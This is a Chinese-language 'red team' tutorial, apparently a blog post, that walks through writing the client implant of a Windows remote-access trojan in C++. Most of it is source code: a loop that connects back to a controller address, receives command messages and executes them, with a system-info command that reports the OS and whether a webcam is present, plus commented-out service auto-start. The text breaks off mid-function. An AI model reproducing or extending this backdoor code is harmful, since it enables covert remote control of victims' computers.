红队专题
- 招募六边形战士队员
- 服务端编写
- 新建工程
- server函数
- 创建主线程类
- 获取配置信息
- 运行
- command 命令
- 头文件里创建引用
- win32 类库/头文件
- startsocket 开始监听 类函数
- 添加类
- StartSocket
- mysend/myrecv
- 设置
- m_sock
- Common 头文件
- MSGINFO_S 结构体
- ThreadMain头文件
- runflag 启动
招募六边形战士队员
一起学习 代码审计、安全开发、web攻防、逆向等。。。
私信联系
服务端编写
新建工程
server函数
// FackExec_N0vv.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
void Server();
void Server()
{
CThreadMain Thread_Main; // 主线程类 对象
Thread_Main.GetInfo(); //获取配置信息
/*if(Auto[1] == '1')
{
wcscpy_s(Thread_Main.MyServiceName,(wchar_t*)ServiceName);
}*/
// 增加自启动 服务名
while(true)
{
if(Thread_Main.RunFlag == false)
{
break;
}
SOCKET sock;
sock = Thread_Main.Run();
Thread_Main.Command(sock);
}
}
int _tmain(int argc, _TCHAR* argv[])
{
Server();
return 0;
}
创建主线程类
获取配置信息
void CThreadMain::GetInfo()
{
int Port = atoi(czPort);
this->Time = atoi(czTime);
this->SetupDir = atoi(czSetupDir);
this->AutoFlag = atoi(czAuto);
}
用来生成配置文件
运行
SOCKET CThreadMain::Run()
{
SOCKET sock;
while(true)
{
sock = m_sock.StartSocket(this->Address); // 连接远程主机 ip
if(sock == NULL)
{
Sleep(this->Time * 1000); // 等待60s
printf("Sleep\n");
continue;
}
else
{
break;
}
}
return sock;
}
command 命令
void CThreadMain::Command(SOCKET Sock)
{
MSGINFO_S msg;
m_Socket = Sock;
while(1)
{
if(this->RunFlag == false) // 程序是否可以运行
{
break;
}
memset(&msg,0,sizeof(MSGINFO_S)); // 消息结构体 清空
if(m_sock.MyRecv(Sock,(char*)&msg,sizeof(MSGINFO_S))==0) // 连接
{
break;
}
ExecCommand(msg,Sock); // 执行命令
}
return;
}
void CThreadMain::ExecCommand(MSGINFO_S msg,SOCKET l_Socket)
{
switch(msg.Msg_id)
{
case SYSINFO:
{
printf("GetSystemInfo\n");
m_sys.SendSysinfo(l_Socket);
}
break;
default:
{
printf("UnKnow Command\n");
return;
}
}
}
头文件里创建引用
#pragma once
class CThreadMain
{
public:
CThreadMain(void);
~CThreadMain(void);
void GetInfo();
private:
SOCKET Run();
void Command(SOCKET Sock);
void ExecCommand(MSGINFO_S msg,SOCKET l_Socket);
};
win32 类库/头文件
#include <winsock2.h> stdafx.h中
头文件调用 stdafx.h
#pragma comment(lib,“ws2_32.lib”)
#pragma comment(lib,“User32.lib”)
#pragma comment(lib,“Advapi32.lib”)
startsocket 开始监听 类函数
添加类
StartSocket
链接远程ip地址
SOCKET CMySocket::StartSocket(char Address[160])
{
WSADATA data;
WORD w=MAKEWORD(2,2);
::WSAStartup(w,&data);
SOCKET s;
s=::socket(AF_INET,SOCK_STREAM,0);
sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(m_port);
addr.sin_addr.S_un.S_addr = inet_addr(Address);
if(::connect(s,(sockaddr*)&addr,sizeof(addr))==SOCKET_ERROR)
{
printf("Connect Error\n");
DWORD e = GetLastError();
printf("LastError:%d\n",e);
s = NULL;
}
else
{
printf("Connect Success!\n");
}
return s;
}
SOCKET StartSocket(char Address[160])
mysend/myrecv
int CMySocket::MySend(SOCKET socket,const char* buf,int bytes)
{
const char *b = buf;
while(bytes > 0)
{
int r = send(socket,b,bytes,0);
if(r < 0)
{
printf("Socket_Error\n");
return r;
}
else if(r == 0)
{
printf("Socket_Error\n");
break;
}
bytes -= r;
b += r;
}
return b - (char*)buf;
}
int CMySocket::MyRecv(SOCKET socket,char* buf,int bytes)
{
char *b = (char*)buf;
while(bytes > 0)
{
int r = recv(socket,b,bytes,0);
if(r < 0)
{
return 0;
}
else if(r == 0)
{
break;
}
bytes = bytes - r;
b = b + r;
}
return b - (char*)buf;
}
#pragma once
#include "stdafx.h"
class CMySocket
{
public:
CMySocket(void);
~CMySocket(void);
SOCKET StartSocket(char Address[160]);
int MySend(SOCKET socket,const char* buf,int bytes);
int MyRecv(SOCKET socket,char* buf,int bytes);
};
设置
m_sock
#pragma once
#include "stdafx.h"
#include "MySocket.h"
private:
void ExecCommand(MSGINFO_S msg,SOCKET l_Socket);
CMySocket m_sock;
char Address[160];
};
void CThreadMain::GetInfo()
{
int Port = 1474;
//this->Time = 60;
//this->SetupDir = 0;
//this->AutoFlag = 1;
m_sock.m_port = Port;
strcpy_s(Address,"127.0.0.1");
}
Common 头文件
头文件 新添加项
MSGINFO_S 结构体
#pragma once
#include <windows.h>
#define SYSINFO 0x01
typedef struct tagMSGINFO //传输消息结构体
{
int Msg_id;
BYTE context[1024*5];
}MSGINFO_S;
typedef struct tagSYSTEMINFO
{
int os;
bool Cam; //摄像头
double ver;
}SYSTEMINFO_S;
ThreadMain头文件
#pragma once
#include "stdafx.h"
#include "MySocket.h"
#include "Common.h"
class CThreadMain
{
public:
CThreadMain(void);
~CThreadMain(void);
void GetInfo();
bool RunFlag;
SOCKET Run();
void Command(SOCKET Sock);
private:
void ExecCommand(MSGINFO_S msg,SOCKET l_Socket);
CMySocket m_sock;
char Address[160];
SOCKET m_Socket;
};
runflag 启动
#include "stdafx.h"
#include "ThreadMain.h"
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"User32.lib")
#pragma comment(lib,"Advapi32.lib")
void Server();
void Server()
{
CThreadMain Thread_Main;
Thread_Main.RunFlag = true;
Thread_Main.GetInfo(); //获取配置信息
